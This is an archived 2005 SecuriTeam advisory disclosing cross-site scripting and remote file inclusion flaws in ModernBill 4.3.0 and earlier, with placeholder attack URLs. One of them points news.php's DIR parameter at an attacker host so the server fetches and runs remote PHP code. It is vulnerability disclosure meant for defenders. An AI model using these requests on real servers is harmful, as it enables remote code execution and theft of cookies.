[UNIX] Multiple Vulnerabilities in ModernBill

From: SecuriTeam (support_at_securiteam.com)
Date: 04/12/05

  • Next message: SecuriTeam: "[NEWS] Vulnerabilities in Cisco IOS Secure Shell Server"
    To: list@securiteam.com
    Date: 12 Apr 2005 15:50:11 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Multiple Vulnerabilities in ModernBill
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.modernbill.com/> ModernBill is "a widely used billing and
    management software used by webhosts to manage billing and financial
    data". ModernBill is prone to remote file inclusion and cross site
    scripting. These vulnerabilities could allow for an attacker to execute
    client side code in the context of the victims web browser, steal
    sensitive user data, and run system commands remotely on the affected web
    server. A fixed version is available and users are advised to upgrade
    immediately.

    DETAILS

    Vulnerable Systems:
     * ModernBill version 4.3.0 and prior

    Immune Systems:
     * ModernBill version 4.3.1 or newer

    Cross Site Scripting:
    The ModernBill order forms are prone to multiple cross site scripting
    issues. Bellow are a few examples of this particular issue:
    http://example.com/order/orderwiz.php?v=1&aid=&c_code=[XSS]
    http://example.com/order/orderwiz.php?v=1&aid=[XSS]

    This vulnerability could be used to steal cookie based authentication
    credentials within the scope of the current domain, or render hostile code
    in a victim's browser.

    Remote File Include Vulnerability:
    ModernBill ships with a directory titled "samples" that resides in the
    root ModernBill directory. This directory contains several files to help
    users learn how to customize ModernBill to specifically fit their needs.
    One of the scripts included in this directory is vulnerable to a very
    dangerous remote file include vulnerability. Lets have a look at the file
    "news.php"

    // ~~~~~~~~~~~~~~~~~
    // DO NOT EDIT START
    // ~~~~~~~~~~~~~~~~~
    include_once($DIR."include/functions.inc.php");

    If globals are set to on, and no include restrictions are in effect then
    we can include any PHP code of our choice remotely. Of course the hosting
    the malicious file to be included could not have php enabled, or the file
    would be parsed before it reached the victim server:
    http://example.com/samples/news.php?DIR=http://attacker/

    This issue is very dangerous when present, but regardless of your server
    configuration you are still encouraged to upgrade immediately.

    Solution:
    A fix for the mentioned issues has been available for quite some time now
    and users should upgrade their ModernBill installations.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:security@gulftech.org>
    GulfTech Security Research.
    The original article can be found at:
    <http://www.gulftech.org/?node=research&article_id=00067-04102005>
    http://www.gulftech.org/?node=research&article_id=00067-04102005

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NEWS] Vulnerabilities in Cisco IOS Secure Shell Server"

    Relevant Pages

    • [UNIX] Trend Micro VirusWall Buffer Overflow in VSAPI Library
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... buffer overflow vulnerability in VSAPI library allows arbitrary code ... is called "vscan" which is set suid root by default. ... permissions and thus granted all local users the privilege to execute the ...
      (Securiteam)
    • [UNIX] SCO Multiple Local Buffer Overflow
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Local exploitation of a buffer overflow vulnerability in the ppp binary, ... allows attackers to gain root privileges. ...
      (Securiteam)
    • [NT] Microsoft Word 6.0/95 Document Converter Buffer Overflow (MS04-041)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... WordPad is "a word processing application that uses the MFC rich edit ... Remote exploitation of a buffer overflow vulnerability in Microsoft ... Microsoft Word format files into the Rich Text Format natively handled by ...
      (Securiteam)
    • [UNIX] Tikiwiki Command Injection and Arbitrary File Exposure Vulnerabilities
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Two security vulnerabilities have been recently discovered in Tikiwiki, ... Remote exploitation of an input validation vulnerability in Tikiwiki ... allows attackers to gain access to arbitrary files on the vulnerable ...
      (Securiteam)
    • [NT] Ipswitch Multiple Vulnerabilities (IMail IMAP LIST Command DoS, Collaboration Suite SMTP Format
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Ipswitch Multiple Vulnerabilities (IMail IMAP LIST Command DoS, ... Collaboration Suite SMTP Format String) ... Remote exploitation of a denial of service vulnerability in Ipswitch ...
      (Securiteam)